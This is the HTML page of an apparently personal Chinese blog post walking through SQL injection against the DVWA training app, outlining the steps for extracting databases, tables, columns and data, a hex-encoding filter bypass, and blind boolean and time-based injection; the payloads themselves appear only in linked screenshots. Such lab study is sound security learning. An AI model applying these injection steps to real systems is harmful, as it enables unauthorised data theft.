<!DOCTYPE html>
<html style="display: none;" lang="zh">
    <head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <!--
        © Material Theme
        https://github.com/viosey/hexo-theme-material
        Version: 1.5.2 -->
    <script>
        window.materialVersion = "1.5.2"
        // Delete localstorage with these tags
        window.oldVersion = [
            'codestartv1',
            '1.3.4',
            '1.4.0',
            '1.4.0b1',
            '1.5.0'
        ]
    </script>

    <!-- dns prefetch -->
    <meta http-equiv="x-dns-prefetch-control" content="on">


    <link rel="dns-prefetch" href="https://cdn1.lncld.net">


    <link rel="dns-prefetch" href="https://busuanzi.ibruce.info">












    <!-- Meta & Info -->
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">

    <!-- Title -->
    
    <title>
        
            SQL注入 | 
        
        Ghakerm&#39;blog
    </title>

    <!-- Favicons -->
    <link rel="icon shortcut" type="image/ico" href="/img/favicon.png">
    <link rel="icon" href="/img/favicon.png">

    <meta name="format-detection" content="telephone=no">
    <meta name="description" itemprop="description" content>
    <meta name="keywords" content=",兴趣班">
    <meta name="theme-color" content="#0097A7">

    <!-- Disable Fucking Bloody Baidu Tranformation -->
    <meta http-equiv="Cache-Control" content="no-transform">
    <meta http-equiv="Cache-Control" content="no-siteapp">

    <!--[if lte IE 9]>
        <link rel="stylesheet" href="/css/ie-blocker.css">

        
            <script src="/js/ie-blocker.zhCN.js"></script>
        
    <![endif]-->

    <!-- Import lsloader -->
    <script>(function(){window.lsloader={jsRunSequence:[],jsnamemap:{},cssnamemap:{}};lsloader.removeLS=function(a){try{localStorage.removeItem(a)}catch(b){}};lsloader.setLS=function(a,c){try{localStorage.setItem(a,c)}catch(b){}};lsloader.getLS=function(a){var c="";try{c=localStorage.getItem(a)}catch(b){c=""}return c};versionString="/*"+(window.materialVersion||"unknownVersion")+"*/";lsloader.clean=function(){try{var b=[];for(var a=0;a<localStorage.length;a++){b.push(localStorage.key(a))}b.forEach(function(e){var f=lsloader.getLS(e);if(window.oldVersion){var d=window.oldVersion.reduce(function(g,h){return g||f.indexOf("/*"+h+"*/")!==-1},false);if(d){lsloader.removeLS(e)}}})}catch(c){}};lsloader.clean();lsloader.load=function(f,a,b,d){if(typeof b==="boolean"){d=b;b=undefined}d=d||false;b=b||function(){};var e;e=this.getLS(f);if(e&&e.indexOf(versionString)===-1){this.removeLS(f);this.requestResource(f,a,b,d);return}if(e){var c=e.split(versionString)[0];if(c!=a){console.log("reload:"+a);this.removeLS(f);this.requestResource(f,a,b,d);return}e=e.split(versionString)[1];if(d){this.jsRunSequence.push({name:f,code:e});this.runjs(a,f,e)}else{document.getElementById(f).appendChild(document.createTextNode(e));b()}}else{this.requestResource(f,a,b,d)}};lsloader.requestResource=function(b,e,a,c){var d=this;if(c){this.iojs(e,b,function(h,f,g){d.setLS(f,h+versionString+g);d.runjs(h,f,g)})}else{this.iocss(e,b,function(f){document.getElementById(b).appendChild(document.createTextNode(f));d.setLS(b,e+versionString+f)},a)}};lsloader.iojs=function(d,b,g){var a=this;a.jsRunSequence.push({name:b,code:""});try{var f=new XMLHttpRequest();f.open("get",d,true);f.onreadystatechange=function(){if(f.readyState==4){if((f.status>=200&&f.status<300)||f.status==304){if(f.response!=""){g(d,b,f.response);return}}a.jsfallback(d,b)}};f.send(null)}catch(c){a.jsfallback(d,b)}};lsloader.iocss=function(f,c,h,a){var b=this;try{var g=new XMLHttpRequest();g.open("get",f,true);g.onreadystatechange=function(){if(g.readyState==4){if((g.status>=200&&g.status<300)||g.status==304){if(g.response!=""){h(g.response);a();return}}b.cssfallback(f,c,a)}};g.send(null)}catch(d){b.cssfallback(f,c,a)}};lsloader.iofonts=function(f,c,h,a){var b=this;try{var g=new XMLHttpRequest();g.open("get",f,true);g.onreadystatechange=function(){if(g.readyState==4){if((g.status>=200&&g.status<300)||g.status==304){if(g.response!=""){h(g.response);a();return}}b.cssfallback(f,c,a)}};g.send(null)}catch(d){b.cssfallback(f,c,a)}};lsloader.runjs=function(f,c,e){if(!!c&&!!e){for(var b in this.jsRunSequence){if(this.jsRunSequence[b].name==c){this.jsRunSequence[b].code=e}}}if(!!this.jsRunSequence[0]&&!!this.jsRunSequence[0].code&&this.jsRunSequence[0].status!="failed"){var a=document.createElement("script");a.appendChild(document.createTextNode(this.jsRunSequence[0].code));a.type="text/javascript";document.getElementsByTagName("head")[0].appendChild(a);this.jsRunSequence.shift();if(this.jsRunSequence.length>0){this.runjs()}}else{if(!!this.jsRunSequence[0]&&this.jsRunSequence[0].status=="failed"){var d=this;var a=document.createElement("script");a.src=this.jsRunSequence[0].path;a.type="text/javascript";this.jsRunSequence[0].status="loading";a.onload=function(){d.jsRunSequence.shift();if(d.jsRunSequence.length>0){d.runjs()}};document.body.appendChild(a)}}};lsloader.tagLoad=function(b,a){this.jsRunSequence.push({name:a,code:"",path:b,status:"failed"});this.runjs()};lsloader.jsfallback=function(c,b){if(!!this.jsnamemap[b]){return}else{this.jsnamemap[b]=b}for(var a in this.jsRunSequence){if(this.jsRunSequence[a].name==b){this.jsRunSequence[a].code="";this.jsRunSequence[a].status="failed";this.jsRunSequence[a].path=c}}this.runjs()};lsloader.cssfallback=function(e,c,b){if(!!this.cssnamemap[c]){return}else{this.cssnamemap[c]=1}var d=document.createElement("link");d.type="text/css";d.href=e;d.rel="stylesheet";d.onload=d.onerror=b;var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(d,a)};lsloader.runInlineScript=function(c,b){var a=document.getElementById(b).innerText;this.jsRunSequence.push({name:c,code:a});this.runjs()}})();</script>

    <!-- Import queue -->
    <script>function Queue(){this.dataStore=[];this.offer=b;this.poll=d;this.execNext=a;this.debug=false;this.startDebug=c;function b(e){if(this.debug){console.log("Offered a Queued Function.")}if(typeof e==="function"){this.dataStore.push(e)}else{console.log("You must offer a function.")}}function d(){if(this.debug){console.log("Polled a Queued Function.")}return this.dataStore.shift()}function a(){var e=this.poll();if(e!==undefined){if(this.debug){console.log("Run a Queued Function.")}e()}}function c(){this.debug=true}}var queue=new Queue();</script>

    <!-- Import CSS -->
    
        <style id="material_css"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("material_css","/css/material.min.css?Z7a72R1E4SxzBKR/WGctOA==",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>
        <style id="style_css"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("style_css","/css/style.min.css?MKetZV3cUTfDxvMffaOezg==",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>

        

    

    

    <!-- Config CSS -->

<!-- Other Styles -->
<style>
  body, html {
    font-family: Roboto, "Helvetica Neue", Helvetica, "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei", "微软雅黑", Arial, sans-serif;
    overflow-x: hidden !important;
  }
  
  code {
    font-family: Consolas, Monaco, 'Andale Mono', 'Ubuntu Mono', monospace;
  }

  a {
    color: #00838F;
  }

  .mdl-card__media,
  #search-label,
  #search-form-label:after,
  #scheme-Paradox .hot_tags-count,
  #scheme-Paradox .sidebar_archives-count,
  #scheme-Paradox .sidebar-colored .sidebar-header,
  #scheme-Paradox .sidebar-colored .sidebar-badge{
    background-color: #0097A7 !important;
  }

  /* Sidebar User Drop Down Menu Text Color */
  #scheme-Paradox .sidebar-colored .sidebar-nav>.dropdown>.dropdown-menu>li>a:hover,
  #scheme-Paradox .sidebar-colored .sidebar-nav>.dropdown>.dropdown-menu>li>a:focus {
    color: #0097A7 !important;
  }

  #post_entry-right-info,
  .sidebar-colored .sidebar-nav li:hover > a,
  .sidebar-colored .sidebar-nav li:hover > a i,
  .sidebar-colored .sidebar-nav li > a:hover,
  .sidebar-colored .sidebar-nav li > a:hover i,
  .sidebar-colored .sidebar-nav li > a:focus i,
  .sidebar-colored .sidebar-nav > .open > a,
  .sidebar-colored .sidebar-nav > .open > a:hover,
  .sidebar-colored .sidebar-nav > .open > a:focus,
  #ds-reset #ds-ctx .ds-ctx-entry .ds-ctx-head a {
    color: #0097A7 !important;
  }

  .toTop {
    background: #757575 !important;
  }

  .material-layout .material-post>.material-nav,
  .material-layout .material-index>.material-nav,
  .material-nav a {
    color: #757575;
  }

  #scheme-Paradox .MD-burger-layer {
    background-color: #757575;
  }

  #scheme-Paradox #post-toc-trigger-btn {
    color: #757575;
  }

  .post-toc a:hover {
    color: #00838F;
    text-decoration: underline;
  }

</style>


<!-- Theme Background Related-->

    <style>
      body{
        background-color: #F5F5F5;
      }

      /* blog_info bottom background */
      #scheme-Paradox .material-layout .something-else .mdl-card__supporting-text{
        background-color: #fff;
      }
    </style>




<!-- Fade Effect -->

    <style>
      .fade {
        transition: all 800ms linear;
        -webkit-transform: translate3d(0,0,0);
        -moz-transform: translate3d(0,0,0);
        -ms-transform: translate3d(0,0,0);
        -o-transform: translate3d(0,0,0);
        transform: translate3d(0,0,0);
        opacity: 1;
      }

      .fade.out{
        opacity: 0;
      }
    </style>


<!-- Import Font -->
<!-- Import Roboto -->

    <link href="https://fonts.googleapis.com/css?family=Roboto:300,400,500" rel="stylesheet">


<!-- Import Material Icons -->


    <style id="material_icons"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("material_icons","/css/material-icons.css?pqhB/Rd/ab0H2+kZp0RDmw==",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>




    <!-- Import jQuery -->
    
        <script>lsloader.load("jq_js","/js/jquery.min.js?ezyEvm8ST5CGfpA+kFFi1g==", true)</script>
    

    <!-- WebAPP Icons -->
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="application-name" content="Ghakerm&#39;blog">
    <meta name="msapplication-starturl" content="http://www.gackerm.me/2018/05/17/SQL注入/">
    <meta name="msapplication-navbutton-color" content="#0097A7">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-title" content="Ghakerm&#39;blog">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <link rel="apple-touch-icon" href="/img/favicon.png">

    <!-- Site Verification -->
    
    

    <!-- RSS -->
    

    <!-- The Open Graph protocol -->
    <meta property="og:url" content="http://www.gackerm.me/2018/05/17/SQL注入/">
    <meta property="og:type" content="blog">
    <meta property="og:title" content="SQL注入 | Ghakerm&#39;blog">
    <meta property="og:image" content="/img/favicon.png">
    <meta property="og:description" content>
    <meta property="og:article:tag" content="兴趣班"> 

    
        <meta property="article:published_time" content="Thu May 17 2018 19:01:49 GMT+0800">
        <meta property="article:modified_time" content="Wed Dec 18 2019 20:04:53 GMT+0800">
    

    <!-- The Twitter Card protocol -->
    <meta name="twitter:card" content="summary_large_image">

    <!-- Add canonical link for SEO -->
    
        <link rel="canonical" href="http://www.gackerm.me/2018/05/17/SQL注入/index.html">
    

    <!-- Structured-data for SEO -->
    
        


<script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "BlogPosting",
    "mainEntityOfPage": "http://www.gackerm.me/2018/05/17/SQL注入/index.html",
    "headline": "SQL注入",
    "datePublished": "Thu May 17 2018 19:01:49 GMT+0800",
    "dateModified": "Wed Dec 18 2019 20:04:53 GMT+0800",
    "author": {
        "@type": "Person",
        "name": "GhackerM",
        "image": {
            "@type": "ImageObject",
            "url": "/img/avatar.png"
        },
        "description": "If time could stop at the moment when we first met"
    },
    "publisher": {
        "@type": "Organization",
        "name": "Ghakerm&#39;blog",
        "logo": {
            "@type":"ImageObject",
            "url": "/img/favicon.png"
        }
    },
    "keywords": ",兴趣班",
    "description": "",
}
</script>


    

    <!-- Analytics -->
    
        <script>
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
    })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
    ga('create', 'UA-136440440-1', 'auto');ga('send', 'pageview');
</script>
    
    
    

    <!-- Custom Head -->
    

</head>


    
        <body id="scheme-Paradox" class="lazy">
            <div class="material-layout  mdl-js-layout has-drawer is-upgraded">
                
                <!-- Main Container -->
                <main class="material-layout__content" id="main">
                    <!-- Top Anchor -->
                    <div id="top"></div>
                    
                        <!-- Hamburger Button -->
                        <button class="MD-burger-icon sidebar-toggle">
                            <span id="MD-burger-id" class="MD-burger-layer"></span>
                        </button>
                    
                    <!-- Post TOC -->

    
    <!-- Back Button -->
    <!--
    <div class="material-back" id="backhome-div" tabindex="0">
        <a class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon"
           href="#" onclick="window.history.back();return false;"
           target="_self"
           role="button"
           data-upgraded=",MaterialButton,MaterialRipple">
            <i class="material-icons" role="presentation">arrow_back</i>
            <span class="mdl-button__ripple-container">
                <span class="mdl-ripple"></span>
            </span>
        </a>
    </div>
    -->


    <!-- Left aligned menu below button -->
    
    
    <button id="post-toc-trigger-btn"
        class="mdl-button mdl-js-button mdl-button--icon">
        <i class="material-icons">format_list_numbered</i>
    </button>

    <ul class="post-toc-wrap mdl-menu mdl-menu--bottom-left mdl-js-menu mdl-js-ripple-effect" for="post-toc-trigger-btn" style="max-height:80vh; overflow-y:scroll;">
        <ol class="post-toc"><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#SQL注入学习"><span class="post-toc-number">1.</span> <span class="post-toc-text">SQL注入学习</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#DVWA-SQL-Injection（利用演示）"><span class="post-toc-number">1.1.</span> <span class="post-toc-text">DVWA-SQL Injection（利用演示）</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#DVWA-SQL-Injection-Blind-介绍"><span class="post-toc-number">1.2.</span> <span class="post-toc-text">DVWA-SQL Injection (Blind)介绍</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#手工盲注思路"><span class="post-toc-number">1.2.1.</span> <span class="post-toc-text">手工盲注思路</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#SQL-INJECTION-BLIND-模块核心漏洞利用-Low-Level"><span class="post-toc-number">1.3.</span> <span class="post-toc-text">SQL INJECTION (BLIND)模块核心漏洞利用-Low Level</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#基于布尔的盲注："><span class="post-toc-number">1.3.1.</span> <span class="post-toc-text">基于布尔的盲注：</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#基于时间的盲注："><span class="post-toc-number">1.3.2.</span> <span class="post-toc-text">基于时间的盲注：</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#SQL-INJECTION-BLIND-模块核心漏洞利用-Medium-Level"><span class="post-toc-number">1.4.</span> <span class="post-toc-text">SQL INJECTION (BLIND)模块核心漏洞利用-Medium Level</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#首先是基于布尔的盲注："><span class="post-toc-number">1.4.1.</span> <span class="post-toc-text">首先是基于布尔的盲注：</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#然后是基于时间的盲注："><span class="post-toc-number">1.4.2.</span> <span class="post-toc-text">然后是基于时间的盲注：</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#SQL-INJECTION-BLIND-模块核心漏洞利用-High-Level"><span class="post-toc-number">1.5.</span> <span class="post-toc-text">SQL INJECTION (BLIND)模块核心漏洞利用- High Level</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#SQL-INJECTION-BLIND-模块核心代码分析-Impossible-Level"><span class="post-toc-number">1.6.</span> <span class="post-toc-text">SQL INJECTION (BLIND)模块核心代码分析- Impossible Level</span></a></li></ol></li></ol>
    </ul>
    




<!-- Layouts -->

    <!-- Post Module -->
    <div class="material-post_container">

        <div class="material-post mdl-grid">
            <div class="mdl-card mdl-shadow--4dp mdl-cell mdl-cell--12-col">

                <!-- Post Header(Thumbnail & Title) -->
                
    <!-- Paradox Post Header -->
    
        
            <!-- Random Thumbnail -->
            <div class="post_thumbnail-random mdl-card__media mdl-color-text--grey-50">
            <script type="text/ls-javascript" id="post-thumbnail-script">
    var randomNum = Math.floor(Math.random() * 19 + 1);

    $('.post_thumbnail-random').attr('data-original', '/img/random/material-' + randomNum + '.png');
    $('.post_thumbnail-random').addClass('lazy');
</script>

        
    
            <p class="article-headline-p">
                SQL注入
            </p>
        </div>





                
                    <!-- Paradox Post Info -->
                    <div class="mdl-color-text--grey-700 mdl-card__supporting-text meta">

    <!-- Author Avatar -->
    <div id="author-avatar">
        <img src="/img/avatar.png" width="44px" height="44px" alt="Author Avatar"/>
    </div>
    <!-- Author Name & Date -->
    <div>
        <strong>GhackerM</strong>
        <span>5月 17, 2018</span>
    </div>

    <div class="section-spacer"></div>

    <!-- Favorite -->
    <!--
        <button id="article-functions-like-button" class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon btn-like">
            <i class="material-icons" role="presentation">favorite</i>
            <span class="visuallyhidden">favorites</span>
        </button>
    -->

    <!-- Qrcode -->
    

    <!-- Tags (bookmark) -->
    
    <button id="article-functions-viewtags-button" class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon">
        <i class="material-icons" role="presentation">bookmark</i>
        <span class="visuallyhidden">bookmark</span>
    </button>
    <ul class="mdl-menu mdl-menu--bottom-right mdl-js-menu mdl-js-ripple-effect" for="article-functions-viewtags-button">
        <li class="mdl-menu__item">
        <a class="post_tag-link" href="/tags/兴趣班/">兴趣班</a>
    </ul>
    

    <!-- Share -->
    
        <button id="article-fuctions-share-button" class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon">
    <i class="material-icons" role="presentation">share</i>
    <span class="visuallyhidden">share</span>
</button>
<ul class="mdl-menu mdl-menu--bottom-right mdl-js-menu mdl-js-ripple-effect" for="article-fuctions-share-button">
    
    <!-- Leancloud Views -->
        <a class="post_share-link" href="#">
            <li class="mdl-menu__item">
                <span id="/2018/05/17/SQL注入/" class="leancloud-views_num" data-flag-title="SQL注入">
     &nbsp;浏览量
</span>

            </li>
        </a>
    

    
        
            <!-- Busuanzi Views -->
            <a class="post_share-link" href="#">
                <li class="mdl-menu__item">
                    <span id="busuanzi_container_page_pv">
                        <span id="busuanzi_value_page_pv"></span>&nbsp;浏览量
                    </span>
                </li>
            </a>
        
    

    <!-- Share Weibo -->
    
        <a class="post_share-link" href="http://service.weibo.com/share/share.php?appkey=&title=SQL注入&url=http://www.gackerm.me/2018/05/17/SQL注入/index.html&pic=http://www.gackerm.me/img/favicon.png&searchPic=false&style=simple" target="_blank">
            <li class="mdl-menu__item">
                分享到微博
            </li>
        </a>
    

    <!-- Share Twitter -->
    
        <a class="post_share-link" href="https://twitter.com/intent/tweet?text=SQL注入&url=http://www.gackerm.me/2018/05/17/SQL注入/index.html&via=GhackerM" target="_blank">
            <li class="mdl-menu__item">
                分享到 Twitter
            </li>
        </a>
    

    <!-- Share Facebook -->
    
        <a class="post_share-link" href="https://www.facebook.com/sharer/sharer.php?u=http://www.gackerm.me/2018/05/17/SQL注入/index.html" target="_blank">
            <li class="mdl-menu__item">
                分享到 Facebook
            </li>
        </a>
    

    <!-- Share Google+ -->
    

    <!-- Share LinkedIn -->
    

    <!-- Share QQ -->
    
        <a class="post_share-link" href="http://connect.qq.com/widget/shareqq/index.html?site=Ghakerm&#39;blog&title=SQL注入&summary=&pics=http://www.gackerm.me/img/favicon.png&url=http://www.gackerm.me/2018/05/17/SQL注入/index.html" target="_blank">
            <li class="mdl-menu__item">
                分享到 QQ
            </li>
        </a>
    

    <!-- Share Telegram -->
    
</ul>

    
</div>

                

                <!-- Post Content -->
                <div id="post-content" class="mdl-color-text--grey-700 mdl-card__supporting-text fade out">
    
        <h1 id="SQL注入学习"><a href="#SQL注入学习" class="headerlink" title="SQL注入学习"></a>SQL注入学习</h1><h2 id="DVWA-SQL-Injection（利用演示）"><a href="#DVWA-SQL-Injection（利用演示）" class="headerlink" title="DVWA-SQL Injection（利用演示）"></a>DVWA-SQL Injection（利用演示）</h2><p>Low等级利用：</p>
<ul>
<li>判断是否存在注入，注入是字符型还是数字型</li>
</ul>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfgy1frejsnbubbj30mb0dcgm1.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfgy1frejsnbubbj30mb0dcgm1.jpg</a>)</p>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgdhecxouj30lz0lqq45.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgdhecxouj30lz0lqq45.jpg</a>)</p>
<ul>
<li>猜解SQL查询语句中的字段数</li>
</ul>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgdiubzvqj30h20asmxb.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgdiubzvqj30h20asmxb.jpg</a>)</p>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgdjbe2ulj30jf0ddwew.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgdjbe2ulj30jf0ddwew.jpg</a>)</p>
<ul>
<li>确定显示的字段顺序</li>
</ul>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgdk9hg20j30jr07kwes.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgdk9hg20j30jr07kwes.jpg</a>)</p>
<ul>
<li>获取当前数据库</li>
</ul>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgdl5tgn3j30g20423yg.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgdl5tgn3j30g20423yg.jpg</a>)</p>
<ul>
<li>获取数据库中的表</li>
</ul>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgdm212omj30l303m0t0.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgdm212omj30l303m0t0.jpg</a>)</p>
<ul>
<li>获取表中的字段名</li>
</ul>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgdmpaa3gj30kx02waac.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgdmpaa3gj30kx02waac.jpg</a>)</p>
<ul>
<li>获取数据</li>
</ul>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgdnb0864j30xh06nt97.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgdnb0864j30xh06nt97.jpg</a>)</p>
<p>Medium等级利用：</p>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgdvdmd5pj30zp0ju40e.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgdvdmd5pj30zp0ju40e.jpg</a>)
源代码：</p>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgdwsh10ej31hc0kc75v.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgdwsh10ej31hc0kc75v.jpg</a>)</p>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frge2oq22bj30mc0kvmy3.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frge2oq22bj30mc0kvmy3.jpg</a>)</p>
<p>虽然前端使用了下拉选择菜单，但我们依然可以通过抓包，将获取到的参数放入到repeater窗口，不断改参数，提交恶意构造的查询参数。</p>
<ul>
<li>判断是否存在注入，注入是字符型还是数字型</li>
</ul>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frge9pshgkj30hu0ns7ay.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frge9pshgkj30hu0ns7ay.jpg</a>)</p>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgeerbu0ij30mc05o0ti.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgeerbu0ij30mc05o0ti.jpg</a>)</p>
<ul>
<li>猜解SQL查询语句中的字段数</li>
</ul>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgg5vlumzj30ho0fw0vh.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgg5vlumzj30ho0fw0vh.jpg</a>)</p>
<ul>
<li>猜解SQL查询语句中的字段顺序</li>
</ul>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgg7hwd49j30gt08swfe.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgg7hwd49j30gt08swfe.jpg</a>)</p>
<ul>
<li>获取当前数据库名称</li>
</ul>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgg9fcaulj30en06qt9b.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgg9fcaulj30en06qt9b.jpg</a>)</p>
<ul>
<li>获取数据库中的表</li>
</ul>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frggaequfzj30hw025aab.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frggaequfzj30hw025aab.jpg</a>)</p>
<ul>
<li>获取表中的字段名</li>
</ul>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frggb3yo4fj30t6097whw.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frggb3yo4fj30t6097whw.jpg</a>)</p>
<p>查询失败：You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘&#39;users&#39;‘ at line 1<br>将表名转成16进制数，进行绕过</p>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frggcey1g1j30o006cq4q.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frggcey1g1j30o006cq4q.jpg</a>)</p>
<ul>
<li>获取数据</li>
</ul>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frggd9zzcrj30tc0dnna8.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frggd9zzcrj30tc0dnna8.jpg</a>)</p>
<p>High等级利用:</p>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frggf32c1ej30o20b4jru.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frggf32c1ej30o20b4jru.jpg</a>)</p>
<ul>
<li>判断注入类型</li>
</ul>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frggge2mvtj30hy0d741l.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frggge2mvtj30hy0d741l.jpg</a>)</p>
<p>和前面一致  直接查询数据</p>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frggha1apzj30i103k0te.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frggha1apzj30i103k0te.jpg</a>)
(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgghvn1yvj30hw03hdg2.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgghvn1yvj30hw03hdg2.jpg</a>)</p>
<h2 id="DVWA-SQL-Injection-Blind-介绍"><a href="#DVWA-SQL-Injection-Blind-介绍" class="headerlink" title="DVWA-SQL Injection (Blind)介绍"></a>DVWA-SQL Injection (Blind)介绍</h2><p>SQL Injection（Blind），即SQL盲注，与一般注入的区别在于，一般的注入攻击者可以直接从页面上看到注入语句的执行结果，而盲注时攻击者通常是无法从显示页面上获取执行结果，甚至连注入语句是否执行都无从得知，因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。</p>
<h3 id="手工盲注思路"><a href="#手工盲注思路" class="headerlink" title="手工盲注思路"></a>手工盲注思路</h3><p>手工盲注的过程，就像你与一个机器人聊天，这个机器人知道的很多，但只会回答“是”或者“不是”，因此你需要询问它这样的问题，例如“数据库名字的第一个字母是不是a啊？”，通过这种机械的询问，最终获得你想要的数据。<br>盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注，这里由于实验环境的限制，只演示基于布尔的盲注与基于时间的盲注。<br>下面简要介绍手工盲注的步骤（可与之前的手工注入作比较）：<br>1.判断是否存在注入，注入是字符型还是数字型<br>2.猜解当前数据库名<br>3.猜解数据库中的表名<br>4.猜解表中的字段名<br>5.猜解数据</p>
